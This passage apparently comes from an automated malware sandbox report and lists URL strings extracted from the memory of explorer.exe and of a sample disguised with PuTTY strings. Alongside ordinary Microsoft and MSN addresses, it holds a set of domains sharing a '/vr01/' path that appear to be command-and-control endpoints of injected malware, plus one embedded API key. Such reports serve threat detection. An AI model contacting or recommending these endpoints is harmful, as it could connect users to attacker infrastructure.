Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.molobeverello.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.molobeverello.com/vr01/www.jupitr-claim.top
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.molobeverello.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nicolbauer.com
Source: explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nicolbauer.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nicolbauer.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oregonjobs.co
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oregonjobs.co/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oregonjobs.co/vr01/www.helyibudapest.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oregonjobs.coReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.owletbaby.shop
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.owletbaby.shop/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.owletbaby.shop/vr01/www.mayorii.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.owletbaby.shopReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.poseidoncrm.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.poseidoncrm.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.poseidoncrm.com/vr01/www.yesxoit.xyz
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.poseidoncrm.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yesxoit.xyz
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yesxoit.xyz/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yesxoit.xyz/vr01/www.elcaporalburley.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yesxoit.xyzReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursweets.online
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursweets.online/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursweets.online/vr01/www.ethicai.pro
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursweets.onlineReferer:
Source: explorer.exe, 00000006.00000002.3842240210.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2299846067.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1362710142.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSJM
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSZM
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSp
Source: explorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/rT
Source: explorer.exe, 00000006.00000000.1359952336.000000000862F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
Source: explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
Source: explorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/~T
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1356648660.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3083184749.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000003.2299319275.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.000000000899E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: hj3YCvtlg7.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
